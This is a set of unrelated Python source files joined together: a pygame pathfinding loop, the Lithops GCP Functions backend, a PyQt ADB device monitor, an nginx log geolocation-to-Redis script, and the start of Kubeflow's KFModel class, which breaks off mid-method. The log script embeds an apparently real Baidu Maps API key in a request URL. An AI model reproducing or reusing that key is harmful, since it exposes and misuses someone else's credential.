                                    newPath = True
                            else:
                                neighbor.g = tempG
                                newPath = True
                                openSet.append(neighbor)
                            if newPath:
                                # Better route found: refresh scores and back-pointer
                                neighbor.h = euclidean(neighbor, end)
                                neighbor.f = neighbor.g + neighbor.h
                                neighbor.prev = current
            else:
                print("No Solution!\n-> There was no possible solution")
                break
        '''
        Drawing the results
        '''
        for column in grid:
            for spot in column:
                if spot.wall:
                    spot.show(win, WHITE)
                elif spot == end:
                    spot.show(win, LIGHT_BLUE)
                elif spot in path and not processing:
                    spot.show(win, LIGHT_BLUE)
                elif spot in closeSet:
                    spot.show(win, RED)
                elif spot in openSet:
                    spot.show(win, GREEN)
                else:
                    spot.show(win, BLACK)
        pygame.display.flip()
main()
|
<reponame>giarve/lithops<filename>lithops/serverless/backends/gcp_functions/gcp_functions.py
#
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import logging
import json
import base64
import httplib2
import sys
import zipfile
import time
import lithops
from google.cloud import pubsub_v1
from google.oauth2 import service_account
from google_auth_httplib2 import AuthorizedHttp
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from google.auth import jwt
from lithops.version import __version__
from lithops.utils import version_str
from lithops.constants import COMPUTE_CLI_MSG, JOBS_PREFIX
from lithops.constants import TEMP as TEMP_PATH
from . import config as gcp_config
logger = logging.getLogger(__name__)
ZIP_LOCATION = os.path.join(TEMP_PATH, 'lithops_gcp.zip')
SCOPES = ('https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/pubsub')
FUNCTIONS_API_VERSION = 'v1'
PUBSUB_API_VERSION = 'v1'
AUDIENCE = "https://pubsub.googleapis.com/google.pubsub.v1.Publisher"
class GCPFunctionsBackend:
def __init__(self, gcp_functions_config, internal_storage):
    """Initialize the GCP Functions compute backend.

    Args:
        gcp_functions_config: backend config dict; must contain the keys
            'region', 'service_account', 'project_name',
            'credentials_path', 'retries' and 'retry_sleep'.
        internal_storage: Lithops internal storage handler, used to stage
            runtime archives and metadata.
    """
    self.name = 'gcp_functions'
    self.type = 'faas'
    self.gcp_functions_config = gcp_functions_config
    self.package = 'lithops_v' + __version__
    self.region = gcp_functions_config['region']
    self.service_account = gcp_functions_config['service_account']
    self.project = gcp_functions_config['project_name']
    self.credentials_path = gcp_functions_config['credentials_path']
    self.num_retries = gcp_functions_config['retries']
    self.retry_sleep = gcp_functions_config['retry_sleep']
    self.internal_storage = internal_storage

    # Setup Pub/Sub client
    try:
        # Get credentials from the service-account JSON file.
        # Use a context manager so the file handle is not leaked
        # (original code did json.load(open(...)) without closing).
        with open(self.credentials_path) as cred_file:
            service_account_info = json.load(cred_file)
        credentials = jwt.Credentials.from_service_account_info(service_account_info,
                                                                audience=AUDIENCE)
        credentials_pub = credentials.with_claims(audience=AUDIENCE)
    except Exception:
        # Credentials file missing/unreadable: fall back to the ambient
        # credentials of the GCP function environment. Narrowed from a
        # bare `except:` so SystemExit/KeyboardInterrupt still propagate.
        credentials_pub = None

    self.publisher_client = pubsub_v1.PublisherClient(credentials=credentials_pub)

    msg = COMPUTE_CLI_MSG.format('GCP Functions')
    logger.info("{} - Region: {} - Project: {}".format(msg, self.region, self.project))
def _format_function_name(self, runtime_name, runtime_memory):
runtime_name = (self.package + '_' + runtime_name).replace('.', '-')
return '{}_{}MB'.format(runtime_name, runtime_memory)
def _format_topic_name(self, runtime_name, runtime_memory):
return self._format_function_name(runtime_name, runtime_memory) + '_topic'
def _unformat_action_name(self, action_name):
split = action_name.split('_')
runtime_name = split[2].replace('-', '.')
runtime_memory = int(split[3].replace('MB', ''))
return runtime_name, runtime_memory
def _full_function_location(self, function_name):
return 'projects/{}/locations/{}/functions/{}'.format(self.project, self.region, function_name)
def _full_topic_location(self, topic_name):
return 'projects/{}/topics/{}'.format(self.project, topic_name)
def _full_default_location(self):
return 'projects/{}/locations/{}'.format(self.project, self.region)
def _encode_payload(self, payload):
return base64.b64encode(bytes(json.dumps(payload), 'utf-8')).decode('utf-8')
def _get_auth_session(self):
    """Return an AuthorizedHttp session built from the service-account file."""
    creds = service_account.Credentials.from_service_account_file(self.credentials_path,
                                                                  scopes=SCOPES)
    return AuthorizedHttp(creds, http=httplib2.Http())
def _get_funct_conn(self):
    """Build an authenticated Cloud Functions API client."""
    session = self._get_auth_session()
    return build('cloudfunctions', FUNCTIONS_API_VERSION,
                 http=session, cache_discovery=False)
def _get_default_runtime_image_name(self):
    """Runtime name matching the local interpreter, e.g. 'python3.8'."""
    return 'python{}'.format(version_str(sys.version_info))
def _get_runtime_requirements(self, runtime_name):
    """Return the pip requirements (list of lines) for *runtime_name*.

    Built-in runtimes use the default requirement set; user runtimes are
    fetched from internal storage. Raises Exception if the runtime is
    neither a default nor a registered user runtime.
    """
    if runtime_name in gcp_config.DEFAULT_RUNTIMES:
        return gcp_config.DEFAULT_REQUIREMENTS

    user_runtimes = self._list_runtimes(default_runtimes=False)
    if runtime_name not in user_runtimes:
        raise Exception('Runtime {} does not exist. '
                        'Available runtimes: {}'.format(runtime_name,
                                                        gcp_config.DEFAULT_RUNTIMES + user_runtimes))

    storage_key = '/'.join([gcp_config.USER_RUNTIMES_PREFIX, runtime_name])
    raw_reqs = self.internal_storage.get_data(key=storage_key)
    return raw_reqs.decode('utf-8').splitlines()
def _list_runtimes(self, default_runtimes=True):
    """List available runtime names; optionally include the defaults first."""
    defaults = list(gcp_config.DEFAULT_RUNTIMES) if default_runtimes else []
    # User runtimes are stored under USER_RUNTIMES_PREFIX/<name>
    user_keys = self.internal_storage.storage.list_keys(self.internal_storage.bucket,
                                                        prefix=gcp_config.USER_RUNTIMES_PREFIX)
    user_runtimes = [key.split('/', 1)[-1] for key in user_keys]
    return defaults + user_runtimes
def _create_handler_zip(self, runtime_name):
    """Package the Lithops function handler into ZIP_LOCATION.

    The archive contains the backend entry point (renamed to main.py),
    the runtime's requirements.txt and the whole local lithops module.
    """
    logger.debug("Creating function handler zip in {}".format(ZIP_LOCATION))
    def add_folder_to_zip(zip_file, full_dir_path, sub_dir=''):
        # Recursively add a directory tree under the 'lithops/' archive prefix,
        # skipping __pycache__ directories.
        for file in os.listdir(full_dir_path):
            full_path = os.path.join(full_dir_path, file)
            if os.path.isfile(full_path):
                zip_file.write(full_path, os.path.join('lithops', sub_dir, file), zipfile.ZIP_DEFLATED)
            elif os.path.isdir(full_path) and '__pycache__' not in full_path:
                add_folder_to_zip(zip_file, full_path, os.path.join(sub_dir, file))
    # Get runtime requirements and write them to a temp requirements file
    runtime_requirements = self._get_runtime_requirements(runtime_name)
    requirements_file_path = os.path.join(TEMP_PATH, '{}_requirements.txt'.format(runtime_name))
    with open(requirements_file_path, 'w') as reqs_file:
        for req in runtime_requirements:
            reqs_file.write('{}\n'.format(req))
    try:
        with zipfile.ZipFile(ZIP_LOCATION, 'w') as lithops_zip:
            # Add Lithops entryfile to zip archive
            current_location = os.path.dirname(os.path.abspath(__file__))
            main_file = os.path.join(current_location, 'entry_point.py')
            lithops_zip.write(main_file, 'main.py', zipfile.ZIP_DEFLATED)
            # Add runtime requirements.txt to zip archive
            lithops_zip.write(requirements_file_path, 'requirements.txt', zipfile.ZIP_DEFLATED)
            # Add Lithops to zip archive
            module_location = os.path.dirname(os.path.abspath(lithops.__file__))
            add_folder_to_zip(lithops_zip, module_location)
    except Exception as e:
        raise Exception('Unable to create Lithops package: {}'.format(e))
def _create_function(self, runtime_name, memory, code, timeout=60, trigger='HTTP'):
    """Deploy a Cloud Function and block until it is fully active.

    Args:
        runtime_name: runtime identifier (e.g. 'python3.8').
        memory: function memory in MB (also encoded in the function name).
        code: zipped function source (bytes), staged through internal storage.
        timeout: function execution timeout in seconds.
        trigger: 'HTTP' or 'Pub/Sub'.

    Raises:
        Exception: if deployment ends OFFLINE or reports an unknown status.
    """
    logger.debug("Creating function {} - Memory: {} Timeout: {} Trigger: {}".format(runtime_name,
                                                                                    memory, timeout, trigger))
    default_location = self._full_default_location()
    function_location = self._full_function_location(self._format_function_name(runtime_name, memory))
    bin_name = self._format_function_name(runtime_name, memory) + '_bin.zip'
    # Stage the code archive in the internal storage bucket so GCP can pull it
    self.internal_storage.put_data(bin_name, code)
    python_runtime_ver = 'python{}'.format(version_str(sys.version_info))
    cloud_function = {
        'name': function_location,
        'description': self.package,
        'entryPoint': 'main',
        'runtime': python_runtime_ver.lower().replace('.', ''),
        'timeout': str(timeout) + 's',
        'availableMemoryMb': memory,
        'serviceAccountEmail': self.service_account,
        'maxInstances': 0,  # NOTE(review): presumably 0 = no explicit instance cap — confirm against the GCP API docs
        'sourceArchiveUrl': 'gs://{}/{}'.format(self.internal_storage.bucket, bin_name)
    }
    if trigger == 'HTTP':
        cloud_function['httpsTrigger'] = {}
    elif trigger == 'Pub/Sub':
        cloud_function['eventTrigger'] = {
            'eventType': 'providers/cloud.pubsub/eventTypes/topic.publish',
            'resource': self._full_topic_location(self._format_topic_name(runtime_name, memory)),
            'failurePolicy': {}
        }
    response = self._get_funct_conn().projects().locations().functions().create(
        location=default_location,
        body=cloud_function
    ).execute(num_retries=self.num_retries)
    # Wait until function is completely deployed
    while True:
        response = self._get_funct_conn().projects().locations().functions().get(
            name=function_location
        ).execute(num_retries=self.num_retries)
        logger.debug('Function status is {}'.format(response['status']))
        if response['status'] == 'ACTIVE':
            break
        elif response['status'] == 'OFFLINE':
            raise Exception('Error while deploying Cloud Function')
        elif response['status'] == 'DEPLOY_IN_PROGRESS':
            time.sleep(self.retry_sleep)
            logger.info('Waiting for function to be deployed...')
        else:
            raise Exception('Unknown status {}'.format(response['status']))
    # Delete runtime bin archive from storage
    self.internal_storage.storage.delete_object(self.internal_storage.bucket, bin_name)
def build_runtime(self, runtime_name, requirements_file):
    """Register a user-defined runtime by storing its requirements file.

    Raises Exception when no requirements file is given or when the local
    Python version is not supported by GCP Functions.
    """
    if requirements_file is None:
        raise Exception('Please provide a `requirements.txt` file with the necessary modules')

    logger.info('Going to create runtime {} ({}) for GCP Functions...'.format(runtime_name, requirements_file))

    runtime_python_ver = 'python{}'.format(version_str(sys.version_info))
    if runtime_python_ver not in gcp_config.DEFAULT_RUNTIMES:
        raise Exception('Runtime {} is not available for GCP Functions, '
                        'please use one of {}'.format(runtime_python_ver, gcp_config.DEFAULT_RUNTIMES))

    with open(requirements_file, 'r') as req_file:
        requirements = req_file.read()
    storage_key = '/'.join([gcp_config.USER_RUNTIMES_PREFIX, runtime_name])
    self.internal_storage.put_data(storage_key, requirements)

    logger.info('Ok - Created runtime {}'.format(runtime_name))
    logger.info('Available runtimes: {}'.format(self._list_runtimes(default_runtimes=True)))
def create_runtime(self, runtime_name, memory, timeout=60):
    """Create a Pub/Sub-triggered runtime function and return its metadata.

    Recreates the trigger topic if it already exists, packages the handler
    zip, deploys the cloud function and extracts the runtime's metadata.
    """
    logger.debug("Creating runtime {} - Memory: {} Timeout: {}".format(runtime_name, memory, timeout))
    # Create topic
    topic_name = self._format_topic_name(runtime_name, memory)
    topic_list_request = self.publisher_client.list_topics(request={'project': 'projects/{}'.format(self.project)})
    topic_location = self._full_topic_location(topic_name)
    topics = [topic.name for topic in topic_list_request]
    if topic_location in topics:
        # Delete-and-recreate drops anything left over from a previous deployment
        logger.debug("Topic {} already exists - Restarting queue...".format(topic_location))
        self.publisher_client.delete_topic(topic=topic_location)
    logger.debug("Creating topic {}...".format(topic_location))
    self.publisher_client.create_topic(name=topic_location)
    # Create function
    self._create_handler_zip(runtime_name)
    with open(ZIP_LOCATION, "rb") as action_zip:
        action_bin = action_zip.read()
    self._create_function(runtime_name, memory, code=action_bin, timeout=timeout, trigger='Pub/Sub')
    # Get runtime preinstalls
    runtime_meta = self._generate_runtime_meta(runtime_name, memory)
    return runtime_meta
def delete_runtime(self, runtime_name, runtime_memory, delete_runtime_storage=True):
    """Delete a deployed runtime: its Cloud Function, its Pub/Sub trigger
    topic and (optionally) the user runtime stored in internal storage.

    Blocks until the function deletion has fully completed on GCP.
    """
    action_name = self._format_function_name(runtime_name, runtime_memory)
    function_location = self._full_function_location(action_name)
    logger.debug('Going to delete runtime {}'.format(action_name))
    # Delete function
    self._get_funct_conn().projects().locations().functions().delete(
        name=function_location,
    ).execute(num_retries=self.num_retries)
    logger.debug('Request Ok - Waiting until function is completely deleted')
    # Wait until function is completely deleted: keep polling GET; once the
    # function is gone the GET raises HttpError (not found), which breaks
    # the loop. While it still exists we expect status DELETE_IN_PROGRESS.
    while True:
        try:
            response = self._get_funct_conn().projects().locations().functions().get(
                name=function_location
            ).execute(num_retries=self.num_retries)
            logger.debug('Function status is {}'.format(response['status']))
            if response['status'] == 'DELETE_IN_PROGRESS':
                time.sleep(self.retry_sleep)
            else:
                # Any other status is unexpected. Note this raise is NOT caught
                # by the `except HttpError` below (it is a plain Exception), so
                # it deliberately propagates to the caller.
                raise Exception('Unknown status: {}'.format(response['status']))
        except HttpError as e:
            # Function no longer exists -> deletion finished.
            logger.debug('Ok - {}'.format(e))
            break
    # Delete Pub/Sub topic attached as trigger for the cloud function
    logger.debug('Listing Pub/Sub topics...')
    topic_name = self._format_topic_name(runtime_name, runtime_memory)
    topic_location = self._full_topic_location(topic_name)
    topic_list_request = self.publisher_client.list_topics(request={'project': 'projects/{}'.format(self.project)})
    topics = [topic.name for topic in topic_list_request]
    logger.debug('Topics: {}'.format(topics))
    if topic_location in topics:
        logger.debug('Going to delete topic {}'.format(topic_name))
        self.publisher_client.delete_topic(topic=topic_location)
        logger.debug('Ok - topic {} deleted'.format(topic_name))
    # Delete user runtime from storage
    user_runtimes = self._list_runtimes(default_runtimes=False)
    if runtime_name in user_runtimes and delete_runtime_storage:
        self.internal_storage.storage.delete_object(self.internal_storage.bucket,
                                                    '/'.join([gcp_config.USER_RUNTIMES_PREFIX, runtime_name]))
def clean(self):
    """Delete every Lithops-deployed runtime (functions named with 'lithops_v')."""
    logger.debug('Going to delete all deployed runtimes...')
    for deployed_name in self.list_runtimes():
        # Skip functions that were not deployed by Lithops.
        if 'lithops_v' not in deployed_name:
            continue
        name, memory = self._unformat_action_name(deployed_name)
        self.delete_runtime(name, memory)
def list_runtimes(self, docker_image_name='all'):
    """Return the names of all Cloud Functions deployed in the default location.

    `docker_image_name` is accepted for interface compatibility with other
    backends and is not used here.
    """
    logger.debug('Listing deployed runtimes...')
    response = self._get_funct_conn().projects().locations().functions().list(
        parent=self._full_default_location()
    ).execute(num_retries=self.num_retries)
    # Function resources are fully qualified paths; keep only the last segment.
    deployed = [fn['name'].split('/')[-1] for fn in response.get('functions', [])]
    logger.debug('Deployed runtimes: {}'.format(deployed))
    return deployed
def invoke(self, runtime_name, runtime_memory, payload=None):
    """Invoke a runtime by publishing the JSON-encoded payload to its trigger topic.

    Returns the Pub/Sub message id of the published invocation.

    Fix: the original signature used a mutable default (`payload={}`), which is
    shared across calls; replaced with the None-sentinel idiom. Backward
    compatible: an omitted payload still publishes '{}'. Also dropped the
    redundant `bytes()` wrapper around an already-bytes `.encode()` result.
    """
    if payload is None:
        payload = {}
    topic_location = self._full_topic_location(self._format_topic_name(runtime_name, runtime_memory))
    future = self.publisher_client.publish(topic_location,
                                           json.dumps(payload).encode('utf-8'))
    invocation_id = future.result()
    return invocation_id
def get_runtime_key(self, runtime_name, runtime_memory):
    """Build the unique key that identifies this runtime deployment:
    <backend name>/<region>/<formatted function name>."""
    function_name = self._format_function_name(runtime_name, runtime_memory)
    runtime_key = os.path.join(self.name, self.region, function_name)
    logger.debug('Runtime key: {}'.format(runtime_key))
    return runtime_key
def _generate_runtime_meta(self, runtime_name, memory):
    """Synchronously invoke the deployed function with a 'get_preinstalls'
    payload and return the runtime metadata it leaves in internal storage.

    Raises Exception if the function reports an error or an unexpected result.
    """
    logger.debug('Generating runtime meta for {}...'.format(runtime_name))
    function_name = self._format_function_name(runtime_name, memory)
    function_location = self._full_function_location(function_name)
    logger.debug('Going to synchronously invoke {} through developer API'.format(function_name))
    payload = {
        'get_preinstalls': {
            'runtime_name': runtime_name,
            'storage_config': self.internal_storage.storage.storage_config
        }
    }
    # Data is b64 encoded so we can treat REST call the same as async pub/sub event trigger
    response = self._get_funct_conn().projects().locations().functions().call(
        name=function_location,
        body={'data': json.dumps({'data': self._encode_payload(payload)})}
    ).execute(num_retries=self.num_retries)
    if 'result' in response and response['result'] == 'OK':
        # The function writes its metadata as JSON to storage; fetch it,
        # parse it and remove the temporary object.
        object_key = '/'.join([JOBS_PREFIX, runtime_name + '.meta'])
        runtime_meta_json = self.internal_storage.get_data(object_key)
        runtime_meta = json.loads(runtime_meta_json)
        self.internal_storage.storage.delete_object(self.internal_storage.bucket, object_key)
        return runtime_meta
    elif 'error' in response:
        raise Exception(response['error'])
    else:
        raise Exception('Error at retrieving runtime meta: {}'.format(response))
|
<gh_stars>0
import sys
import os
import time
import subprocess
from functools import partial
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import pyqtSlot, QThread
from PyQt5.QtCore import Qt
from tools.android.ui.ui_main_connect_adb import Ui_MainWindow
from tools.android.adbWorker import WorkerCheckAdb
from tools.android.adbDialog import AdbDeviceDialog
sys._excepthook = sys.excepthook
def my_exception_hook(exctype, value, traceback):
    """Replacement sys.excepthook: echo the exception, delegate to the
    original hook saved in sys._excepthook, then exit with status 1.

    (PyQt swallows exceptions raised in slots; exiting makes them fatal
    and therefore visible during development.)
    """
    print(exctype, value, traceback)
    # Let the previously installed hook do its normal reporting first.
    sys._excepthook(exctype, value, traceback)
    sys.exit(1)
# Set the exception hook to our wrapping function
sys.excepthook = my_exception_hook
# Device-scan interval in seconds (presumably consumed by WorkerCheckAdb's
# polling loop — TODO confirm; it is not referenced in this module).
SCAN_TIME = 5
# Module-level list of currently connected devices (unused in this module's
# visible code — presumably shared with the worker; verify before removing).
deviceConnect = []
class AdbMain(Ui_MainWindow, QtWidgets.QMainWindow):
    """Main window that lists ADB-connected devices.

    A WorkerCheckAdb instance runs in a background QThread and emits
    addDeviceConnect/removeDeviceConnect signals; the slots below keep the
    device list widget and the per-device dialogs in sync.
    """
    def __init__(self):
        super(AdbMain, self).__init__()
        self.setupUi(self)
        # One AdbDeviceDialog per connected device, kept alive here.
        self.deviceDialog = []
        self.hasDevice()
        # Start the background ADB poller in its own thread.
        # NOTE(review): `obj` is a local; only the QThread is parented to the
        # window, so the worker object may be garbage-collected. Consider
        # keeping a reference on self — confirm before changing.
        obj = WorkerCheckAdb()
        thread = QThread(self)
        obj.addDeviceConnect.connect(self.addDeviceConnect)
        obj.removeDeviceConnect.connect(self.removeDeviceConnect)
        obj.moveToThread(thread)
        thread.started.connect(partial(obj.runCheck))
        thread.start()
    @pyqtSlot(str, str)
    def addDeviceConnect(self, deviceName, deviceCode):
        """Slot: a device appeared — add it to the list and open its dialog."""
        deviceInfo = "%s - %s" % (deviceName, deviceCode)
        print("addDeviceConnect %s" % (deviceInfo))
        item = QtWidgets.QListWidgetItem()
        # Stash the raw device code on the item so removeDeviceConnect can find it.
        item.setData(Qt.UserRole, deviceCode)
        item.setText(deviceInfo)
        self.listDevice.addItem(item)
        self.hasDevice()
        # subprocess.call("""adb -s %s exec-out screenrecord --bit-rate=16m --output-format=h264 --size 1920x1080 | /Applications/vlc.app/Contents/MacOS/VLC --demux h264""" % deviceCode)
        dialog = AdbDeviceDialog(deviceInfo=deviceInfo, deviceCode=deviceCode)
        self.deviceDialog.append(dialog)
        dialog.show()
        # exec_() blocks this slot until the dialog closes; clean up on reject.
        if dialog.exec_() == QtWidgets.QDialog.Rejected:
            print("CLEAR - THREAD")
            dialog.clear()
    @pyqtSlot(str)
    def removeDeviceConnect(self, deviceCode):
        """Slot: a device disappeared — drop its list entry and close its dialog."""
        print("removeDeviceConnect %s" % deviceCode)
        for index in range(self.listDevice.count()):
            item = self.listDevice.item(index)
            data = item.data(Qt.UserRole)
            if deviceCode in data:
                self.listDevice.takeItem(self.listDevice.row(item))
        # adb shell "while true; do screenrecord --bit-rate=16m --output-format=h264 --size 1920x1080 -; done" | ffplay -
        # adb -s CB512ETBS9 shell "while true; do screenrecord --output-format=h264 --time-limit 1 -; done" | /Applications/vlc.app/Contents/MacOS/VLC --demux h264 -
        for dialog in self.deviceDialog:
            if dialog.checkCode(deviceCode):
                print("CLEAR - THREAD")
                dialog.clear()
                dialog.close()
        self.hasDevice()
    def hasDevice(self):
        """Toggle between the device list and the 'no device' label."""
        if self.listDevice.__len__() == 0:
            self.lableNoDevice.setVisible(True)
            self.listDevice.setVisible(False)
        else:
            self.lableNoDevice.setVisible(False)
            self.listDevice.setVisible(True)
if __name__ == "__main__":
    # Create the Qt application, raise the main window above other windows,
    # and hand control to the Qt event loop until the app quits.
    app = QtWidgets.QApplication(sys.argv)
    main = AdbMain()
    main.raise_()
    main.show()
    sys.exit(app.exec())
|
<gh_stars>1-10
#!/usr/bin/env python
#coding:utf-8
#realtime time log
import time
import redis
import json
import urllib2
import re
import subprocess
# Redis connection used to publish realtime log events on channel "fm110".
rc = redis.Redis(host='192.168.10.4',port=6379,password='<PASSWORD>')
# Matches a backslash NOT followed by '/', 'u' or '"' — used below to double
# such backslashes so the raw nginx log line becomes valid JSON.
regex = re.compile(r'\\(?![/u"])')
def pat(text):
    """Map a request URL path to its Chinese page-category label.

    The original tested each marker with `re.findall(sub, text) != []`,
    i.e. a plain substring check dressed up as a regex; this version uses
    `in` over an ordered rule table. Order matters and is preserved:
    the first matching marker wins (e.g. a path containing both 'ggWeb'
    and 'home' is classified as 'ggWeb').
    """
    if text == "/":
        return u'主页'
    # (marker substring, category label) — checked in this order.
    rules = [
        ("ggWeb", u'招标公告'),
        ("home", u'首页'),
        ("login", u'登陆'),
        ("news", u'新闻咨询'),
        ("aboutus", u'关于平台'),
        ("memberinfo", u'会员须知'),
        ("search", u'搜索'),
    ]
    for marker, label in rules:
        if marker in text:
            return label
    return u'其他'
def sinaip(ip):
    """Resolve an IP to a city name via the (legacy) Sina iplookup JSON API.

    Returns the reported city, u'未知' (unknown) when the lookup succeeds
    but the city field is empty, and u'北京' when the service reports
    failure (ret == -1) — presumably a hard-coded fallback; TODO confirm
    that Beijing is the intended default on lookup failure.
    """
    url = 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=json&ip='+ip
    postdata = urllib2.urlopen(url).read()
    jsondata = json.loads(postdata)
    if jsondata['ret'] != -1:
        city = jsondata['city']
        if jsondata['city']=="":
            city=u'未知'
    else:
        city=u'北京'
    return city
def baiduip(ip):
    """Resolve an IP to [province, city, isp] via the Baidu Map location API.

    The API's 'address' field is a '|'-separated string (country|province|
    city|district|isp — presumed from the indices used below; TODO confirm).
    Returns a fixed Shanxi/Taiyuan/Unicom triple when the lookup fails or
    the city is empty.
    """
    url='http://api.map.baidu.com/location/ip?ak=25GZBvp4LQ4feQ3HASGDtZv8pu8Br8hj&ip='+ip
    postdata = urllib2.urlopen(url).read()
    jsondata = json.loads(postdata)
    info = []
    if jsondata[u'status']==0 and jsondata[u'content'][u'address_detail'][u'city'][:-1]!='':
        province=jsondata[u'address'].split('|')[1]
        city=jsondata[u'content'][u'address_detail'][u'city']
        # Strip the trailing administrative suffix character ('市' etc.) for
        # short names; keep only the first two characters for long ones.
        if len(city)<=4:
            city=city[:-1]
        else:
            city=city[:2]
        isp=jsondata[u'address'].split('|')[4]
        # Translate the ISP code to its Chinese display name.
        if isp == 'UNICOM':
            isp=u'联通'
        elif isp == 'CHINANET':
            isp=u'电信'
        elif isp == 'ALIBABA':
            isp=u'阿里巴巴'
        elif isp == 'TENCENT':
            isp=u'腾讯网络'
        elif isp == 'CMNET':
            isp=u'移动'
        elif isp == 'OTHER':
            isp=u'其他'
        info.extend([province,city,isp])
        return info
    else:
        # Fallback: [Shanxi, Taiyuan, Unicom] (escaped Chinese strings).
        return [u'\u5c71\u897f', u'\u592a\u539f', u'\u8054\u901a']
def aliip(ip):
    """Resolve an IP to [province, city, isp] via the Taobao IP lookup API.

    A known private address gets a hard-coded answer so no network call is
    made for it. On lookup failure, returns the same Shanxi/Taiyuan/Unicom
    fallback as baiduip().

    Fixes vs. original:
    - the success branch returned `[province, city, isp]` but only assigned
      `region`, so it always raised NameError; the three values are now
      read from the API's data object (region/city/isp fields).
    - the success condition used `or`, which let error responses
      (code != 0) into the branch that indexes jsondata['data']; now `and`.
    """
    if ip == '192.168.127.12':
        # Hard-coded answer: [Shanxi province, Taiyuan, Unicom].
        return [u'\u5c71\u897f\u7701', u'\u592a\u539f', u'\u8054\u901a']
    url = 'http://ip.taobao.com/service/getIpInfo.php?ip=' + ip
    postdata = urllib2.urlopen(url).read()
    jsondata = json.loads(postdata)
    if jsondata['code'] == 0 and jsondata['data']['city'][:-1] != u'':
        province = jsondata['data']['region']
        city = jsondata['data']['city']
        isp = jsondata['data']['isp']
        return [province, city, isp]
    else:
        # Fallback: [Shanxi, Taiyuan, Unicom].
        return [u'\u5c71\u897f', u'\u592a\u539f', u'\u8054\u901a']
# --- realtime log pipeline (Python 2 script; note the `print count` below) ---
# Seed the hit counter with the number of "real" hits already in the log
# (filtering out empty/dash cookies, spiders, one internal IP and one action).
f1 = open("/usr/local/nginx/logs/access.log", "r")
popen = subprocess.Popen('cat /usr/local/nginx/logs/access.log|egrep -iv \'\"cookie\": \"\"|\"cookie\": \"-\"|spider|192.168.127.12|home!getTZ.action\'|wc -l', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
count=int(popen.stdout.readline().strip())
print count
# Follow the live log. NOTE(review): unlike the seeding command above, this
# tail is NOT filtered (the filtered variant is commented out below), so the
# live counter includes lines the seed excluded — confirm this is intended.
popen1 = subprocess.Popen('tail -f /usr/local/nginx/logs/access.log', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
#popen1 = subprocess.Popen('tail -f /usr/local/nginx/logs/access.log|egrep -iv \'\"cookie\": \"\"|\"cookie\": \"-\"|spider|home!getTZ.action\'', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
while True:
    line=popen1.stdout.readline().strip()
    if line:
        #print line
        # Double bare backslashes so the log line parses as JSON.
        line = regex.sub(r"\\\\",line)
        line=json.loads(line)
        count+=1
        line["count"]=count
        #print baiduip(line["ipaddr"]),pat(line["url"]),line["count"]
        # Publish [geo info, page category, running hit count] to subscribers.
        rc.publish("fm110",[baiduip(line["ipaddr"]),pat(line["url"]),line["count"]])
|
# Copyright 2020 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Dict
import sys
import json
import tornado.web
from tornado.httpclient import AsyncHTTPClient
from cloudevents.http import CloudEvent
from http import HTTPStatus
# URL templates for the predictor/explainer endpoints, v1 and v2 dataplane:
# filled with (host, model name).
PREDICTOR_URL_FORMAT = "http://{0}/v1/models/{1}:predict"
EXPLAINER_URL_FORMAT = "http://{0}/v1/models/{1}:explain"
PREDICTOR_V2_URL_FORMAT = "http://{0}/v2/models/{1}/infer"
EXPLAINER_V2_URL_FORMAT = "http://{0}/v2/models/{1}/explain"
# KFModel is intended to be subclassed by various components within KFServing.
class KFModel:
    """Base model class for KFServing components.

    Subclasses typically override load/preprocess/predict/explain/postprocess.
    predict() and explain() forward the request over HTTP to the configured
    predictor/explainer host when one is set.

    Bug fix: explain() previously formatted its URL with self.predictor_host;
    it now uses self.explainer_host, matching the guard above the call.
    """

    def __init__(self, name: str):
        self.name = name
        self.ready = False
        # Dataplane protocol version: "v1" or "v2"; selects the URL template.
        self.protocol = "v1"
        self.predictor_host = None
        self.explainer_host = None
        # The timeout matches what is set in generated Istio resources.
        # We generally don't want things to time out at the request level here,
        # timeouts should be handled elsewhere in the system.
        self.timeout = 600
        self._http_client_instance = None

    @property
    def _http_client(self):
        # Lazily created so constructing a KFModel never touches the IO loop.
        if self._http_client_instance is None:
            self._http_client_instance = AsyncHTTPClient(max_clients=sys.maxsize)
        return self._http_client_instance

    def load(self) -> bool:
        """Mark the model ready; subclasses load weights here. Returns readiness."""
        self.ready = True
        return self.ready

    def preprocess(self, request: Dict) -> Dict:
        """Unwrap CloudEvent requests to their 'data' payload; pass others through."""
        # If cloudevent dict, then parse 'data' field. Otherwise, pass through.
        response = request
        if isinstance(request, CloudEvent):
            response = request.data
            # Try to decode and parse JSON bodies; leave other binary data as-is.
            if isinstance(response, bytes):
                try:
                    response = json.loads(response.decode('UTF-8'))
                except (json.decoder.JSONDecodeError, UnicodeDecodeError) as e:
                    # Only fail hard when the event *claims* to carry JSON.
                    attributes = request._attributes
                    if "content-type" in attributes:
                        if attributes["content-type"] == "application/cloudevents+json" or attributes["content-type"] == "application/json":
                            raise tornado.web.HTTPError(
                                status_code=HTTPStatus.BAD_REQUEST,
                                reason="Unrecognized request format: %s" % e
                            )
        elif isinstance(request, dict):  # CE structured - https://github.com/cloudevents/sdk-python/blob/8773319279339b48ebfb7b856b722a2180458f5f/cloudevents/http/http_methods.py#L126
            if "time" in request \
                    and "type" in request \
                    and "source" in request \
                    and "id" in request \
                    and "specversion" in request \
                    and "data" in request:
                response = request["data"]
        return response

    def postprocess(self, request: Dict) -> Dict:
